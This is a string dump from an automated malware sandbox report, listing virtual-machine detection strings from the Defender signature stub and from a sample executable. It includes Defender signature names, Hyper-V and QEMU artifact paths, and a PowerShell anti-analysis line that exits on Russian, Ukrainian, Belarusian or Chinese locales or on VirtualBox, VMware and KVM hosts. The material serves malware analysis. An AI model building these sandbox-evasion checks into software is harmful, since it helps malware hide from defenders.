Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *VMWARE*
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 0000000B.00000003.18277582882.0000021B5E0B0000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: Vmware
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 0000000B.00000003.18282049510.0000021B5FE1E000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *QEMU*
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp Binary or memory string: Microsoft HvVMwareVMware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000012.00000003.19876584478.000002DF22A4B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWt}I
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 0000000B.00000003.18321478947.0000021B5F112000.00000004.00000001.sdmp Binary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VMRS.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp Binary or memory string: virtual hd
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_inval
id_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: MpSigStub.exe, 00000012.00000003.19875870940.000002DF229DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: *VMWARE*": IsVirtualPCPresent
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.vmgs.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.ISO.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-armel.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp Binary or memory string: VMwareVMware
Source: mpam-728dfe11.exe, 00000011.00000003.18595017457.0000027770039000.00000004.00000001.sdmp Binary or memory string: [read : ToSubclass] boolean IsVirtualMachine = FALSE;
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.VSV.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpoint
pea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-i386.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18691682587.0000000005479000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: Running on VMWare
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: %vmware
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp Binary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: % *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: Virtual HD
Source: MpSigStub.exe, 0000000B.00000003.18305104252.0000021B5E24E000.00000004.00000001.sdmp Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
